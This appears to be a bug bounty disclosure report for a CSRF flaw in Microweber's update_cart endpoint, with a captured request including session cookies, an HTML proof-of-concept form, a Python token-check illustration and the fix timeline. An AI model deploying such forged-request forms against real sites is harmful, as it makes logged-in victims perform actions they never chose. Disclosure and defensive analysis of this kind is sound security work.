CSRF on update cart functionality in microweber/microweber

Valid

Reported on

Mar 31st 2022


I found a CSRF vulnerability in the update cart functionality, where no CSRF token is validated while updating the cart as the authenticated user.

Vulnerable Request:

POST /demo/api/update_cart HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=oVrVA2TbkeiJJIMoTt9UgfFU9BzqP41iW8YIIzmy; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Amodules/load_module%3Ausers/action%3Aprofile; csrf-token-data=%7B%22value%22%3A%22MumtS5v538A6QyfXzmwvx2nhZeXTQSUsQOGQRIwn%22%2C%22expiry%22%3A1648713233295%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

price=199&content_id=12

Steps to Reproduce:

  • After authentication, click on any product and add it to the cart
  • Now, intercept the request; it is the same request shown above under Vulnerable Request.
  • As you can see, no CSRF token is validated, so we can create a CSRF proof of concept to make things easier and to validate the issue.

CSRF Proof of Concept:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/update_cart" method="POST">
      <input type="hidden" name="price" value="199" />
      <input type="hidden" name="content&#95;id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Now, whoever opens the HTML file while logged in will have the product added to their cart.

Impact

An attacker may be able to add a product of their choosing to the victim's account with little user interaction.

Occurrences

A CSRF token needs to be validated on this endpoint.
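As an added illustration (not Microweber's code and not the actual fix shipped in 1.2.13), the check below rejects the captured update_cart request and the PoC's cross-site form submission, while accepting the same XHR once it carries the session token. It looks the token up the Laravel way (a _token form field or an X-CSRF-TOKEN header) and uses the browser's Sec-Fetch-Site and Origin headers as defence in depth; the abbreviated requests and the attacker.example origin are constructed for the example.

```python
import hmac
from urllib.parse import parse_qs

SITE_ORIGIN = "https://demo.microweber.org"
# Constructed session state: the token the server issued to this session
# (the value from the report's csrf-token-data cookie is reused here).
SESSION_TOKEN = "MumtS5v538A6QyfXzmwvx2nhZeXTQSUsQOGQRIwn"

def parse_request(raw):
    """Split a raw HTTP/1.1 request text into (method, headers, body)."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].split(" ", 1)[0], headers, body.strip()

def csrf_check(raw, session_token=SESSION_TOKEN):
    """Return (allowed, reason). The token is the primary control, looked up
    the Laravel way (_token form field or X-CSRF-TOKEN header); the
    Sec-Fetch-Site and Origin checks are defence in depth for browsers."""
    method, headers, body = parse_request(raw)
    if method in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    if headers.get("sec-fetch-site") == "cross-site":
        return False, "Sec-Fetch-Site is cross-site"
    origin = headers.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, "Origin %s is not this site" % origin
    token = headers.get("x-csrf-token") or parse_qs(body).get("_token", [""])[0]
    if not token or not hmac.compare_digest(token, session_token):
        return False, "missing or invalid CSRF token"
    return True, "token valid"

# Constructed requests, abbreviated from the report's capture.
CAPTURED = """POST /demo/api/update_cart HTTP/1.1
Host: demo.microweber.org
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin

price=199&content_id=12
"""
# What a browser sends when the PoC form, hosted on a placeholder attacker origin, submits.
CROSS_SITE = CAPTURED.replace("Origin: https://demo.microweber.org", "Origin: https://attacker.example"
                              ).replace("Sec-Fetch-Site: same-origin", "Sec-Fetch-Site: cross-site")
# The same same-origin XHR after the fix: the front end sends the session token.
FIXED = CAPTURED.replace("Sec-Fetch-Site: same-origin",
                         "Sec-Fetch-Site: same-origin\nX-CSRF-TOKEN: " + SESSION_TOKEN)
```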

We are processing your report and will contact the microweber team within 24 hours. a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
We have sent a follow up to the microweber team. We will try again in 7 days. a year ago
Peter Ivanov modified the report a year ago
Peter Ivanov validated this vulnerability a year ago
Nithissh12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.13 with commit d5635f a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
index.php#L1-L196 has been validated